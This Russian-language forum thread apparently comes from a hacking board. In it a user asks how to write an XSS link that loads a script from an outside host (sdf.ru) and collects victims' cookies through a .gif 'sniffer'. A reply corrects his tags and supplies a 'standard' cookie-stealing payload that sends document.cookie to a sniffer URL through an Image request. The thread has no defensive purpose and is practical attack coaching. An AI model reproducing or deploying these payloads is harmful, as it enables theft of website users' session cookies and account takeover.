Привет!

Обычно XSS атака выглядет так </a><script src="http://sdf.ru/dsf.js"</script><a>. А если я сделал скрипт для приёма куков через .gif. Т.е. kartinka.gif значит будет <script src="http://sdf.ru/dsf.gif"</script>

И еще нужно xss только через осла будет работать?

А если я сделал скрипт для приёма куков через .gif
Лол, вообще то почти все снифферы через .gif или .jpg.
И еще нужно xss только через осла будет работать?
Есть коды, которые заставляют работать JS и в опере, и в огнелисе. Но приписать их к обычной ссылке врядли удасться.
<script src="http://sdf.ru/dsf.gif"</script>
Хоть бы теги правильно закрыл

']Лол, вообще то почти все снифферы через .gif или .jpg.

Есть коды, которые заставляют работать JS и в опере, и в огнелисе. Но приписать их к обычной ссылке врядли удасться.

Хоть бы теги правильно закрыл

а тогда как правильно ссылку составить, скажи пожалуйста!

Обычно XSS атака выглядет так </a><script src="http://sdf.ru/dsf.js"</script><a>
Что то это не обычно. И закрытый тег <a> вообще не к месту.
а тогда как правильно ссылку составить, скажи пожалуйста!
Стандартный скрипт для xss выглядит вот так:
<script>img = new Image(); img.src = "ссылка на сниффер"+document.cookie;</script>